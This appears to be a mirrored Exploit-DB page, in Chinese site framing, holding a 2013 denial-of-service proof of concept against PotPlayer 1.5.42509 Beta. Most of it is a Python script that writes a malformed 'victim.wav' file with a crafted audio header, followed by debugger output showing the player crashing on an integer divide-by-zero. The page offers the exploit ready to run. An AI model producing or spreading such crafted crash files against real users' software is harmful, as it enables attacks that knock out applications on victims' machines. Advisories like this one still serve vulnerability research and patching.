PotPlayer 1.5.42509 Beta – Integer Division by Zero Denial of Service - 体验盒子

作者： sajith

日期： 2013-12-15

类别：

dos

平台：

windows

来源：https://www.exploit-db.com/exploits/30308/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

###########################################################

#[~] Exploit Title:PotPlayer 1.5.42509 Beta - DOS(Integer Division by Zero

#Exploit)

#[~] Author: sajith

#[~] version: PotPlayer 1.5.42509 Beta

#[~]Vendor Homepage: http://daumpotplayer.com/

#[~] Tested in: Windows XP SP3

#[~] vulnerable app link:http://daumpotplayer.com/download/

###########################################################

#POC:

#-------

#!/usr/bin/python

raw_input("Hit Enter to create a malicious file")

f = open("victim.wav","w")

header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"

"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"

"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"

"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")

f.write(header)

print "[#] File created by sajith shetty"

raw_input("Hit enter to exit")

#-----

'''

(694.4d8): Integer divide-by-zero - code c0000094 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=ffffffff ebx=040e0be0 ecx=00000000 edx=00000000 esi=ffffffff

edi=0021977a

eip=748fe82c esp=0131f2a0 ebp=0131f334 iopl=0 nv up ei pl zr na pe

nc

cs=001bss=0023ds=0023es=0023fs=003bgs=0000

efl=00010246

'''